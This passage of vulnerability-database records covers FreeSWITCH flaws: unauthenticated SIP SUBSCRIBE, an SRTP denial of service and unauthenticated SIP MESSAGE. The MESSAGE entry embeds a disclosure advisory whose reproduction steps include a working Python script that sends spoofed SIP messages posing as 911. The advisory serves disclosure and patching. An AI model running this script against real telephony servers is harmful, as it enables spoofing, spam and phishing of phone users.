"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions of FreeSWITCH. Abuse of this security issue allows attackers to subscribe to user agent event notifications without the need to authenticate. This abuse poses privacy concerns and might lead to social engineering or similar attacks. For example, attackers may be able to monitor the status of target SIP extensions. Although this issue was fixed in version v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an older version, may still be vulnerable if the configuration is not updated accordingly. Software upgrades do not update the configuration by default. SIP SUBSCRIBE messages should be authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-subscriptions` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-287",
"description": "CWE-287: Improper Authentication",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-10-26T16:06:09",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"name": "20211026 [ES2021-08] FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/41"
}
],
"source": {
"advisory": "GHSA-g7xg-7c54-rmpj",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2021-41157",
"STATE": "PUBLIC",
"TITLE": "FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "freeswitch",
"version": {
"version_data": [
{
"version_value": "\u003c 1.10.6"
}
]
}
}
]
},
"vendor_name": "signalwire"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions of FreeSWITCH. Abuse of this security issue allows attackers to subscribe to user agent event notifications without the need to authenticate. This abuse poses privacy concerns and might lead to social engineering or similar attacks. For example, attackers may be able to monitor the status of target SIP extensions. Although this issue was fixed in version v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an older version, may still be vulnerable if the configuration is not updated accordingly. Software upgrades do not update the configuration by default. SIP SUBSCRIBE messages should be authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-subscriptions` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-287: Improper Authentication"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj",
"refsource": "CONFIRM",
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj"
},
{
"name": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e",
"refsource": "MISC",
"url": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e"
},
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6",
"refsource": "MISC",
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"name": "20211026 [ES2021-08] FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Oct/41"
}
]
},
"source": {
"advisory": "GHSA-g7xg-7c54-rmpj",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2021-41157",
"datePublished": "2021-10-26T13:35:10",
"dateReserved": "2021-09-15T00:00:00",
"dateUpdated": "2024-08-04T02:59:31.697Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-41105 (GCVE-0-2021-41105)
Vulnerability from nvd – Published: 2021-10-25 22:05 – Updated: 2024-08-04 02:59
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. When handling SRTP calls, FreeSWITCH prior to version 1.10.7 is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack. When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment. The call disconnection occurs due to line 6331 in the source file `switch_rtp.c`, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100). By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller's or the callee's network. This issue is patched in version 1.10.7.
Severity ?
7.5 (High)
CWE
- CWE-20 - Improper Input Validation
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.7
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:59:31.548Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36"
},
{
"name": "20211026 [ES2021-09] FreeSWITCH susceptible to Denial of Service via invalid SRTP packets",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/43"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.7"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. When handling SRTP calls, FreeSWITCH prior to version 1.10.7 is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack. When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment. The call disconnection occurs due to line 6331 in the source file `switch_rtp.c`, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100). By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller\u0027s or the callee\u0027s network. This issue is patched in version 1.10.7."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20: Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-10-26T16:06:06",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36"
},
{
"name": "20211026 [ES2021-09] FreeSWITCH susceptible to Denial of Service via invalid SRTP packets",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/43"
}
],
"source": {
"advisory": "GHSA-jh42-prph-gp36",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH susceptible to Denial of Service via invalid SRTP packets",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2021-41105",
"STATE": "PUBLIC",
"TITLE": "FreeSWITCH susceptible to Denial of Service via invalid SRTP packets"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "freeswitch",
"version": {
"version_data": [
{
"version_value": "\u003c 1.10.7"
}
]
}
}
]
},
"vendor_name": "signalwire"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. When handling SRTP calls, FreeSWITCH prior to version 1.10.7 is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack. When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment. The call disconnection occurs due to line 6331 in the source file `switch_rtp.c`, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100). By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller\u0027s or the callee\u0027s network. This issue is patched in version 1.10.7."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-20: Improper Input Validation"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7",
"refsource": "MISC",
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36",
"refsource": "CONFIRM",
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36"
},
{
"name": "20211026 [ES2021-09] FreeSWITCH susceptible to Denial of Service via invalid SRTP packets",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Oct/43"
}
]
},
"source": {
"advisory": "GHSA-jh42-prph-gp36",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2021-41105",
"datePublished": "2021-10-25T22:05:16",
"dateReserved": "2021-09-15T00:00:00",
"dateUpdated": "2024-08-04T02:59:31.548Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-202110-1048
Vulnerability from variot - Updated: 2023-12-18 13:55FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the auth-messages parameter to true, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the auth-messages parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication. FreeSWITCH There is an authentication vulnerability in.Information may be tampered with. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications.
We are issuing this advisory because, in the course of our work, we have noticed that most FreeSWITCH installations that are exposed to the Internet do not authenticate MESSAGE requests.
How to reproduce the issue
- Install FreeSWITCH v1.10.6 or lower
- Run FreeSWITCH using the default configuration
- Register as a legitimate SIP user with the FreeSWITCH server (e.g.
sip:1000@192.168.1.100where192.168.1.100is your FreeSWITCH server) using a softphone that can process MESSAGE (such as Zoiper) - Save the below Python script to
anon-message.py - Run the Python script
python anon-message.py <freeswitch_ip> <target_extension> - Observe the SIP message appear on your softphone, pretending to be from 911
import sys, socket, random, string
UDP_IP = sys.argv[1]
UDP_PORT = 5060
ext = sys.argv[2]
rand = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
msg="MESSAGE sip:%s@%s SIP/2.0\r\n" % (ext, UDP_IP)
msg+="Via: SIP/2.0/UDP 192.168.1.159:46896;rport;branch=z9hG4bK-%s\r\n" % rand
msg+="Max-Forwards: 70\r\n"
msg+="From: 911 <sip:911@%s>;tag=%s\r\n" %(UDP_IP, rand)
msg+="To: <sip:%s@%s>\r\n" %(ext, UDP_IP)
msg+="Call-ID: %s\r\n" % rand
msg+="CSeq: 1 MESSAGE\r\n"
msg+="Contact: <sip:911@192.168.1.159:48760;transport=udp>\r\n"
msg+="Content-Type: text/plain\r\n"
msg+="Content-Length: 5\r\n\r\n"
msg+="hello"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(msg.encode(), (UDP_IP, UDP_PORT))
Solution and recommendations
Upgrade to a version of FreeSWITCH that fixes this issue.
About Enable Security
Enable Security develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.
Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Disclosure policy
This report is subject to Enable Security's vulnerability disclosure policy which can be found at https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202110-1048",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "freeswitch",
"scope": "lt",
"trust": 1.0,
"vendor": "freeswitch",
"version": "1.10.7"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": null
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": "1.10.7"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.10.7",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-37624"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandro Gauci",
"sources": [
{
"db": "PACKETSTORM",
"id": "164628"
}
],
"trust": 0.1
},
"cve": "CVE-2021-37624",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-37624",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-397859",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2021-013913",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-37624",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2021-37624",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202110-1790",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-397859",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-37624",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication. FreeSWITCH There is an authentication vulnerability in.Information may be tampered with. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications. \n\nWe are issuing this advisory because, in the course of our work, we have noticed that most FreeSWITCH installations that are exposed to the Internet do not authenticate MESSAGE requests. \n\n## How to reproduce the issue\n\n1. Install FreeSWITCH v1.10.6 or lower\n2. Run FreeSWITCH using the default configuration\n3. Register as a legitimate SIP user with the FreeSWITCH server (e.g. `sip:1000@192.168.1.100` where `192.168.1.100` is your FreeSWITCH server) using a softphone that can process MESSAGE (such as Zoiper)\n4. Save the below Python script to `anon-message.py`\n5. Run the Python script `python anon-message.py \u003cfreeswitch_ip\u003e \u003ctarget_extension\u003e`\n6. Observe the SIP message appear on your softphone, pretending to be from 911\n\n\n```python\nimport sys, socket, random, string\n\nUDP_IP = sys.argv[1]\nUDP_PORT = 5060\next = sys.argv[2]\nrand = \u0027\u0027.join(random.choice(string.ascii_lowercase) for i in range(8))\nmsg=\"MESSAGE sip:%s@%s SIP/2.0\\r\\n\" % (ext, UDP_IP)\nmsg+=\"Via: SIP/2.0/UDP 192.168.1.159:46896;rport;branch=z9hG4bK-%s\\r\\n\" % rand\nmsg+=\"Max-Forwards: 70\\r\\n\"\nmsg+=\"From: 911 \u003csip:911@%s\u003e;tag=%s\\r\\n\" %(UDP_IP, rand)\nmsg+=\"To: \u003csip:%s@%s\u003e\\r\\n\" %(ext, UDP_IP)\nmsg+=\"Call-ID: %s\\r\\n\" % rand\nmsg+=\"CSeq: 1 MESSAGE\\r\\n\"\nmsg+=\"Contact: \u003csip:911@192.168.1.159:48760;transport=udp\u003e\\r\\n\"\nmsg+=\"Content-Type: text/plain\\r\\n\"\nmsg+=\"Content-Length: 5\\r\\n\\r\\n\"\nmsg+=\"hello\"\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(msg.encode(), (UDP_IP, UDP_PORT))\n```\n\n## Solution and recommendations\n\nUpgrade to a version of FreeSWITCH that fixes this issue. \n\n## About Enable Security\n\n[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack. \n\n## Disclaimer\n\nThe information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. \n\n## Disclosure policy\n\nThis report is subject to Enable Security\u0027s vulnerability disclosure policy which can be found at \u003chttps://github.com/EnableSecurity/Vulnerability-Disclosure-Policy\u003e",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "PACKETSTORM",
"id": "164628"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-37624",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "164628",
"trust": 1.9
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/25/6",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-397859",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-37624",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397859"
},
{
"db": "VULMON",
"id": "CVE-2021-37624"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013913"
},
{
"db": "PACKETSTORM",
"id": "164628"
},
{
"db": "NVD",
"id": "CVE-2021-37624"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1790"
}
]
},
"id": "VAR-202110-1048",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-397859"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:55:43.286000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FreeSWITCH\u00a0v1.10.7\u00a0Release GitHub",
"trust": 0.8,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"title": "FreeSWITCH Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=167182"
},
{
"title": "",
"trust": 0.1,
